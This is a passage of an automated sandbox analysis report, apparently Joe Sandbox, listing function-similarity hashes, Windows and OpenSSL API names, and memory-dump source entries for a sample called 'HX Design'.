                                                                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                                                                      • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                      • Instruction ID: a88995a32b805eaf733e4967039d5cbe0c8f053d25ba20d1071f0a3bfc24d80d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4741C822E1878193F750BB6495103B9B760FB94764F508335EAAC07AD1DFBCA1E4D720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                                      • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                                      • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                      • Instruction ID: 8b337b5d94f60a9e97ae6456d146367b0c6bd12bc49795a22dcfa0ad283611be
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0A16029A0C6438AFB67AA25F4513BD2395EF45B44F288431DB0D46BFECE7CE8818751
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                                      • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                                      • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                      • Instruction ID: f4b2e1b2bb084907932bbb50325c6fd9bc763b7e6436bb688bb8d2c92c9a8b51
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0418962B09A8182EB569B29D5447B973A8FB44B85F244136DB4D07BBDDF3DE4518300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                      • Instruction ID: 0fbfbcdd6c9f05539b51e2fa2716257d61b27fea095dab5dc16ee6e8bec5e937
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C316C20F0C14775FA54BB64942A3B9A291EF55384FC45434DA4E4B2E3DEECB80CE238
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                      • Instruction ID: 4e52f43d3751e9ee8d3ead5ea3cc6b378f6371290f23be4914f33c39012a5b2e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82511921B0D241A6F764BA2D950077AE292BF84BB4F988734DD7D077D5CEBCE409E620
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                      • Instruction ID: 0951110e04afcd601b5bcd0ea8e43cb15c2962e5385ccc5e352e290fd50850b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16110421708A8191DA20AB29B854079E361FB52FF0F940331EE7D0B7E8CEBCD018D710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF732075957
                                                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF73207596D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1707611234-0
                                                                                                                                                                                                                                                      • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                      • Instruction ID: c266c2288e70c2df7cf00052a8f31d9ea4a8d2f3847caffcfaa776bb6d21a138
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB11A77160C742D1EB546B58A45107BF760FB84771F900236FAAD819E4EFACD458EB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABC6
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                      • Instruction ID: 2efcec7a8f241a409b2e8334b8400b74e6397cc9e3deb9c6ccefcc9e219773cc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D721D811F0868261FEA4B759A49437D92929FC47A0F884239DA2E577D3CEEDE44DF320
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                      • Instruction ID: e2d723c97b07eda993b38d71a23a8e668700ecbb1697e0c5dec6bab3d869dd4b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8541C532A1824597EA34BB1DA54027DF7A0EB55B90F900131EB8E437D1CFADE406EB71
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                                                                      • Opcode ID: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                                      • Instruction ID: ef733f37ffa014ac3a68f62e522e984fcfe559d21026ab6700ddab528cfe89e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6821D321B18652A6FE90BA2279443BAE651FF45BC4FC85930EE0C07786CEBDE04DD324
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                                      • Instruction ID: b2268808dcc6895e0fef63df0caa3147cf879b00530e18e2fb3714a2d01f9d31
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531A422A18652A6F751BB5D884137DAAA0AF80BA0FC10135E96D073D2DFFCE449E731
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                      • Instruction ID: 482b3acd5742264b58462f63515813273879aa820c5c5bf9170c4a8ece18edff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F511A531A1C64192FA60BF9994002BDEA60FF85B84FC44435EE8C57AD6CFBDD404E720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                      • Instruction ID: 3ad266e4316c9312677d1b971cfd184646fc60c70f333835db715ea51f52a890
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F213832A08A4597EB60AF18E08037EB3A0FB84B50F954234E7AD476D9DF7CD408DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                      • Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                                      • Instruction ID: ae3b4e45158193d94bfd51937111f39f6acecb643cbccc76f759354729b89119
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F218176A0C7438EE7669E25B85127927A0FF01B98F288835DB49427EEDF3CE841C751
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                      • Instruction ID: b39856e5f9d064bf5c242c4a17b82f2fc38f4900213d07eb6032335b712e4a18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F101A561A0874552E904FF5A9A001B9E691FF85FE0F884631DE5C23BD6CEBCD445E310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00007FF732066476,?,00007FF73206336E), ref: 00007FF732068EA2
